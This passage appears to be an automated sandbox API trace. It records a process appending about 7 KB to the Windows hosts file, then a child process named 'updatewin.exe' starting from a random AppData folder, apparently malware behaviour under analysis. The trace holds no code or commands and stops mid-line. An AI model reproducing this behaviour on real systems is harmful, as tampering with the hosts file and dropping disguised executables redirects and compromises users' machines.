[0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6127d0 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6127f8 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612820 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612848 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612870 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612898 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6128c0 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6128e8 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612910 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612938 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612960 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612988 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6129b0 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6129d8 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612a00 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612a28 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612a50 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612a78 [0119.391] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x612aa0 [0119.391] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60ff28 | out: hHeap=0x5e0000) returned 1 [0119.392] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18edb0 | out: pszPath="C:\\Windows") returned 0x0 [0119.406] PathAppendW (in: pszPath="C:\\Windows", pMore="System32\\drivers\\etc\\hosts" | out: pszPath="C:\\Windows\\System32\\drivers\\etc\\hosts") returned 1 [0119.406] CreateFileW (lpFileName="C:\\Windows\\System32\\drivers\\etc\\hosts" (normalized: "c:\\windows\\system32\\drivers\\etc\\hosts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0119.406] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x338 [0119.406] SetFilePointer (in: hFile=0xa0, lDistanceToMove=824, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x338 [0119.406] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x30) returned 0x5f5500 [0119.406] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x47) returned 0x610110 [0119.406] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5500 | out: hHeap=0x5e0000) returned 1 [0119.406] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6a) returned 0x610160 [0119.406] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610110 | out: hHeap=0x5e0000) returned 1 [0119.406] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x9e) returned 0x6101d8 [0119.406] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610160 | out: hHeap=0x5e0000) returned 1 [0119.406] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xec) returned 0x610280 [0119.406] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6101d8 | out: hHeap=0x5e0000) returned 1 [0119.406] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x161) returned 0x610110 [0119.406] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610280 | out: hHeap=0x5e0000) returned 1 [0119.407] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x211) returned 0x610280 [0119.407] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610110 | out: hHeap=0x5e0000) returned 1 [0119.407] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x319) returned 0x6104a0 [0119.407] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610280 | out: hHeap=0x5e0000) returned 1 [0119.407] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4a5) returned 0x6107c8 [0119.407] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6104a0 | out: hHeap=0x5e0000) returned 1 [0119.407] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6f7) returned 0x610c78 [0119.407] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6107c8 | out: hHeap=0x5e0000) returned 1 [0119.407] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa72) returned 0x610110 [0119.407] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610c78 | out: hHeap=0x5e0000) returned 1 [0119.407] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfaa) returned 0x612e00 [0119.407] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610110 | out: hHeap=0x5e0000) returned 1 [0119.407] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x17a1) returned 0x616bd0 [0119.407] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612e00 | out: hHeap=0x5e0000) returned 1 [0119.407] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x235f) returned 0x618380 [0119.407] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x616bd0 | out: hHeap=0x5e0000) returned 1 [0119.407] WriteFile (in: hFile=0xa0, lpBuffer=0x6183a0*, nNumberOfBytesToWrite=0x1c76, lpNumberOfBytesWritten=0x18ed70, lpOverlapped=0x0 | out: lpBuffer=0x6183a0*, lpNumberOfBytesWritten=0x18ed70*=0x1c76, lpOverlapped=0x0) returned 1 [0119.497] CloseHandle (hObject=0xa0) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x618380 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c118 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c140 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c168 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c190 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c1b8 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c1e0 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c208 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c230 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c258 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c280 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c2a8 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c2d0 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c2f8 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c320 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c348 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c370 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c398 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c3c0 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c3e8 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c410 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c438 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611618 | out: hHeap=0x5e0000) returned 1 [0119.499] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611640 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611668 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611690 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6116b8 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6116e0 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611708 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611730 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611758 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611780 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6117a8 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6117d0 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6117f8 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611820 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611848 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611870 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611898 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6118c0 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6118e8 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611910 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611938 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611960 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611988 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6119b0 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6119d8 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611a00 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611a28 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611a50 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611a78 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611aa0 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611ac8 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611af0 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611b18 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611b40 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611b68 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611b90 | out: hHeap=0x5e0000) returned 1 [0119.500] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611bb8 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611be0 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611c08 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611c30 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611c58 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611c80 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611ca8 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611cd0 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611cf8 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611d20 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611d48 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611d70 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611d98 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611dc0 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611e18 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611e40 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611e68 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611e90 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611eb8 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611ee0 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611f08 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611f30 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611f58 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611f80 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611fa8 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611fd0 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x611ff8 | out: hHeap=0x5e0000) returned 1 [0119.501] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612020 | out: hHeap=0x5e0000) returned 1 [0119.502] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612048 | out: hHeap=0x5e0000) returned 1 [0119.502] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612070 | out: hHeap=0x5e0000) returned 1 [0119.502] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612098 | out: hHeap=0x5e0000) returned 1 [0119.502] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6120c0 | out: hHeap=0x5e0000) returned 1 [0119.502] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6120e8 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5490 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612110 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612138 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612160 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612188 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6121b0 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6121d8 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612200 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612228 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612250 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612278 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6122a0 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6122c8 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6122f0 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612318 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612340 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612368 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612390 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6123b8 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6123e0 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612408 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612430 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612458 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612480 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6124a8 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6124d0 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6124f8 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612520 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612548 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612570 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612598 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6125c0 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612618 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612640 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612668 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612690 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6126b8 | out: hHeap=0x5e0000) returned 1 [0119.503] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6126e0 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612708 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612730 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612758 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612780 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6127a8 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6127d0 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6127f8 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612820 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612848 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612870 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612898 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6128c0 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6128e8 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612910 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612938 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612960 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612988 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6129b0 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6129d8 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612a00 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612a28 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612a50 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612a78 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612aa0 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x614e00 | out: hHeap=0x5e0000) returned 1 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60eaf8 | out: hHeap=0x5e0000) returned 1 [0119.504] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.504] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0119.504] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60a3e8 | out: hHeap=0x5e0000) returned 1 [0119.505] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60cdc8 | out: hHeap=0x5e0000) returned 1 [0119.505] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0119.505] GetLastError () returned 0x57 [0119.505] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f584 | out: phModule=0x18f584) returned 0 [0119.505] ExitProcess (uExitCode=0x0) [0119.505] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60ad00 | out: hHeap=0x5e0000) returned 1 [0119.506] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Process: id = "9" image_name = "updatewin.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe" page_root = "0x3cb9a000" os_pid = "0x524" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x34c" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 100 os_tid = 0xb28 [0118.770] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36fa7c | out: 